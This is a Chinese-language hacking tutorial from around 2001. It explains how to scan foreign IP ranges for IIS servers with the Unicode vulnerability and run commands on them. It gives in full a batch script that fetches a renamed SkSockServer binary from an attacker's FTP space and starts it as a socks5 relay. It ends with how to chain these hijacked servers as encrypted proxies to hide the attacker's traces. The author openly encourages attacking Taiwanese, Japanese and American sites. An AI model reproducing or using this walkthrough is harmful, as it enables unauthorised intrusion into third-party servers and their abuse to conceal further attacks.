snake的sksockserver(代理跳板)是一个非常好的的 socks5 代理服务器。它非常小巧,才32K,但是可以比较完整的支持tcp协议和udp协议,也支持oicq,而且它具有将通信数据在各跳板之间加密的功能。这使我们能很好的掩盖自己网上踪迹。实乃行走江湖,杀人越货必备工具: -) 。不过,使用它需要一定的服务器入侵知识,这对新手菜鸟是个很大的挑战。因此,我写下这篇文章,希望对大家有所帮助。
所需软件: 流光4http://www.netxeyes.com//
代理跳板SkSockServerhttp://snake12.top263.net/
代理猎手http://dzc.126.com//
准备工作:请申请一个 ftp 空间,现在的免费主页大都带有 ftp 空间的。假设申请的 ftp 空间地址为 ftp.server.com ,用户名为 tom ,密码是 pass 。将 SkSockServer.exe 改名为 char.exe 上传到 ftp 空间。改名的目的当然是为了不那么起眼,你随便改好了。
步骤: 一:在 C 盘根目录下面建立一个文本文件 pp.txt,内容如下:
echo open ftp.server.com>af.txt
echo tom>>af.txt
echo pass>>af.txt
echo bin>>af.txt
echo get char.exe>>af.txt
echo bye>>af.txt
ftp -s:af.txt
del a.txt
del af.txt
char -debug 5262
注意了,请用你的真实的 ftp 网站地址、用户名、密码代替上面的 ftp.server.com 、 tom 和 pass ,否则就不会成功的。现在来检查你的文件是否正确,复制一份 pp.txt ,将它的扩展名改为 bat ,即将文件改名为 pp.bat 。拨号上网,执行 pp.bat ,如果你没有写错,那在 pp.bat 所在目录下面应该会有一个 char.exe 。如果 char.exe 文件不在,检查你的网络连接是否正常,自己用 ftp 软件去看看自己的空间里面是否有 char.exe 这个文件。最重要的要检查 ftp 服务器有没有写错,用户名和密码是否正确。
我来解释一下这个文件的意思.如果你学过 dos ,就会很清楚上面pp.txt文件的作用了。
echo 命令是在屏幕上显示你输入的字符。如,在 dos 下面,输入
echo hello
那它就会显示
hello
“ > ”是管道重定向符号,执行 dos 命令
echo hello>a.txt
命令执行的结果是将 hello 写在一个 a.txt 文件上, 原先a.txt 文件的内容会被删掉,变成只有 hello 这个单词。如果 a.txt 文件不存在,那它会自己生成一个新文件。 “ >>" 和 ">" 不同的地方是它不会删掉文件原有的内容,只会在文件后面追加新内容。
好了,我们来看 pp.txt 文件执行的结果
echo open ftp.server.com>af.txt echo tom>>af.txt echo pass>>af.txt echo bin>>af.txt echo get char.exe>>af.txt echo bye>>af.txt
上面这几个命令执行的结果是在当前路径下生成一个 af.txt 文件,内容如下:
open ftp.server.com
tom
pass
bin
get char.exe
bye
然后是执行 ftp af.txt
这让系统调用 ftp 命令,下载 char.exe 文件。
下面的就没有什么好说了
分别是删除 a.txt , af.txt 文件,在 5262 端口上进行 socks5 服务。
二:打开流光 4, 按 Ctrl+R ,在弹出的对话框中,填写你想搜索的 IP 范围,建议搜索台湾、美国或者日本的网站,它们漏洞比较多。扫描主机类型改为 IIS/FrontPage, 这里我搜索 210.59.70.1 - 210.59.72.254 。搜索结束后会弹出提示的,这里我用了约 5 分钟时间。在流光中间一栏会出现你搜索到的结果,分为主机、系统版本、类型、描述四项。如果主机是黑色的,也就是在类型那一栏里写着 Remote Excute X ,( X 是从 A 到 E 之间的字母,)那这台主机就是有 unicode 漏洞了。点击它,选连接,将允许 IIS 检测 CMD 去掉,然后我们就可以执行命令了。
三:先输入一个命令,看看它是否允许我们写入文件。我们输入
echo hello>a.txt
这时,可能出现几种提示:
A. 如果文件允许写入,就只会显示
[echo hello>a.txt]
那这台服务器就可以作为我们的跳板了。
B. 服务器不允许输入,那么会显示
[echo hello>a.txt]
Access is denied.
这表示这台服务器不允许我们写入文件,呵呵,去找下一台吧,这台没戏了。
C. 使用了陷阱技术
[echo hello>a.txt]
HTTP/1.1 502 Gateway Error
那可能是主机做了一定的防范措施,你可以再重新试试刚才那个命令,也许行的。
D. 其它
我也不知道原因了。试试直接执行下面步骤吧,也许会成功。
好了,出现 A 的情况,那表示这台主机可以作为跳板了。再输入
local file:c:\pp.txt
这个命令就是让流光依次执行 c:\pp.txt 里面的指令,免除我们一个个输入的麻烦。它的输出大致如下:
[local file:c:\pp.txt]
[echo open ftp.server.com>af.txt]
[echo tom>>af.txt]
[echo pass>>af.txt]
[echo bin>>af.txt]
[echo get char.exe>>af.txt]
[echo bye>>af.txt]
[ftp -s:af.txt]
[del af.txt]
[char -debug 5262]
在有些机器上执行的输出有些差异,但基本上是这样的。如果在其中的某一个命令出现了“ HTTP/1.1 502 Gateway Error ” ,那你就要重新执行
local file:c:\pp.txt
如果出现 Connect Failed ,那可能是你的网络连接有问题,检查一下是不是掉线了,再重新执行
local file:c:\pp.txt
四: 我们现在来验证跳板是否真正运行。运行代理猎手,添加结果,将上面那台主机的 IP 加上去,端口是 5262 (就是我爱菱儿啦!),协议是 socks5 。验证它的结果是否 free 。如果是就行了。不是重新执行一次 local file:c:\pp.txt 吧。再不行只好放弃了,另外找一台机器好了。关掉 IIS 远程命令行,再选择另外一台有 unicode 漏洞的机器重复步骤三,这样就可以将所有搜索到的 unicode 漏洞机器作为你的跳板了。
五: 运行 skserver 图形版本,选配置-经过的 skserver ,将刚才弄好的一两个跳板加上去。在这里不要加太多的跳板,否则会影响你的浏览速度,如果没有特殊需要,一个就可以了。按 ok 后在命令里面选择停止,再选择开始,你现在就拥有了一个加密的 socks5 代理。可以用 sockscap 或者 nec e-border client 等 socks 接口软件来调度你的网络程序,呵呵,现在就尽情的冲浪吧。
注意事项: 因为利用 unicode 漏洞得到的权限很低,所以不能让 sksockserver 作为服务运行,也就不能让它每次开机自动运行了。如果它停了你可以很方便的再次运行它。和建立时候一样,打开 IIS 命令行,然后运行这个命令就可以了
char -debug 5262
如果你有任何的疑问,请来信一起探讨。
致谢:非常感激 snake 的代理跳板,它让我可以穿过学校的封锁,尽情的冲浪和与我的菱儿聊天。也谢谢小榕,它的流光是我见过最强大而简单的黑客软件。当然了,我更加不会忘记太阳风,他的代理猎手是带领我走进网络之门的程序。
作者: Nicky
email :liuxua@163.net
---------------------------------------------------------------------------
Nicky的补充:
是的,按我的方法基本上是无法擦除入侵痕迹的。所以,大家要注意安全,一定不要黑国内的网站。如果是黑台湾、日本、美国的小网站,根本没有人会管!另外,用跳板黑会很安全的,只是,当你用它作跳板的时候,同时也暴露了你的I P。放心了,按我的方法你绝对不会误伤国内的网站的,想黑还黑不到呢。流光不允许对国内网站进行探测。
至于说能不能在服务器上面写文件,我想我在文章里面已经交待清楚了。在步骤一里我要大家先输入一个命令echo hello>a.txt ,如果服务器不允许写文件,那它就会返回 Access Denied。这时只好找另外一个服务器了。
判断能不能将该服务器作为跳板的最简单方法。
在步骤一中先输入 echo hello>a.txt
然后再输入 dir a.txt
如果a.txt文件存在,那就可以用它作跳板了。---------------------------------------------------------------------------
-by zaza
使用步骤:
1、使用前提是外部至少要有一个已经安装好的SkSockServer代理(这台外部机器可以在国外也可以在国内。关键是要从本地可以连得上,速度快。不过安装好以后可以通过测试灵活改变)。安装SkSockServer方法见SkSockServer介绍文章。
2、本地使用直接为SkSockServer GUI 建立一个快捷方式放到桌面或者任何你认为方便的地方。我是放在启动组里了。还有配置好的SocksCap也可以放在启动组里。
3、关于SkSockServer GUI精华就在其中配置的3个菜单里面:
客户端 : IP填127.0.0.1 掩码填255.255.255.255 [允许]打上钩。按下[增加]这样就设置了客户端只能通过127.0.0.1这一个ip地址连接(你也可以改为任何你希望的地址)。防止你的机器不小心成为“公共代理” :)
经过的SkSockServer :这里可以填上你得到已经安装好SkSockServer机器的ip和端口了,[允许]打上钩,然后[增加]。注意,如果你填上了超过1个ip地址,SkSockServer可以自动把这N个代理{串联}起来。如图,这里已经用了3个代理串联起来,最终显示地址为最下面一个代理的地址。通过[上移][下移]按钮可以改变串联代理的次序。更为灵活的是,如果因为某些原因你现在不想用某个SkSockServer代理,还可以填上SkSockServer代理的ip地址和端口然后不选中[允许],按下[增加]。然后在列表中删除ACTIVE项为YES的对应机器。图中ACTIVE标记为N的表示暂时没有激活的SkSockServer。(如果snake设计程序时把ACTIVE项改为通过直接打钩激活也许更方便懒人)平时不大容易实现的多重代理现在轻而易举实现。而且最多支持255层代理。
运行选项: 设置本地代理端口为你希望的端口。建议用缺省值1913。反正只有你自己的机器可以连上来,没有特殊原因不必改。自然[允许作为sock5代理]也要打钩。
配置完成SkSockServer GUI记得保存设置,下次打开程序时就不用重新配置了。
4、设置SocksCap,所有的关键在setting项里。不细讲了。看图吧。
5、使用窍门:
通过SkSockServer GUI可以很方便的看到目前代理使用情况。在经过以上配置以后的系统中,用SocksCap打开ie浏览器,随便输入一个网址:www.163.com 一般很快在SkSockServer GUI中可以出现如图的连接提示。如果SkSockServer GUI显示连接传输的字节为0或者一直是非常小的数字(显示的连接传输数为累加值,如果没有增加或者增加缓慢表示连接有故障)说明选用的某个SkSockServer代理连接有问题。单个SkSockServer代理最好换另外一个SkSockServer代理。如果你是多个SkSockServer代理或许是某个中间的代理有问题,只好一个个禁止激活中间代理试出故障地址,然后不用这个中间代理。
经过实际操作现在知道SkSockServer GUI可以很好的支持各类浏览器,QQ,包括大部分网络连接工具。我没有试过网络游戏,网络游戏的问题不要问我。难能可贵QQ和浏览器在使用3重代理时候速度还是非常快。
后记:
这篇文章是由一个在oicq上面认识的朋友-zaza写的,很详细的介绍了如何在本地使用SkServerGUI的方法和步骤。朋友们如果有问题,请mailto: hiww@263.net --- by snake. 2001/6/19
|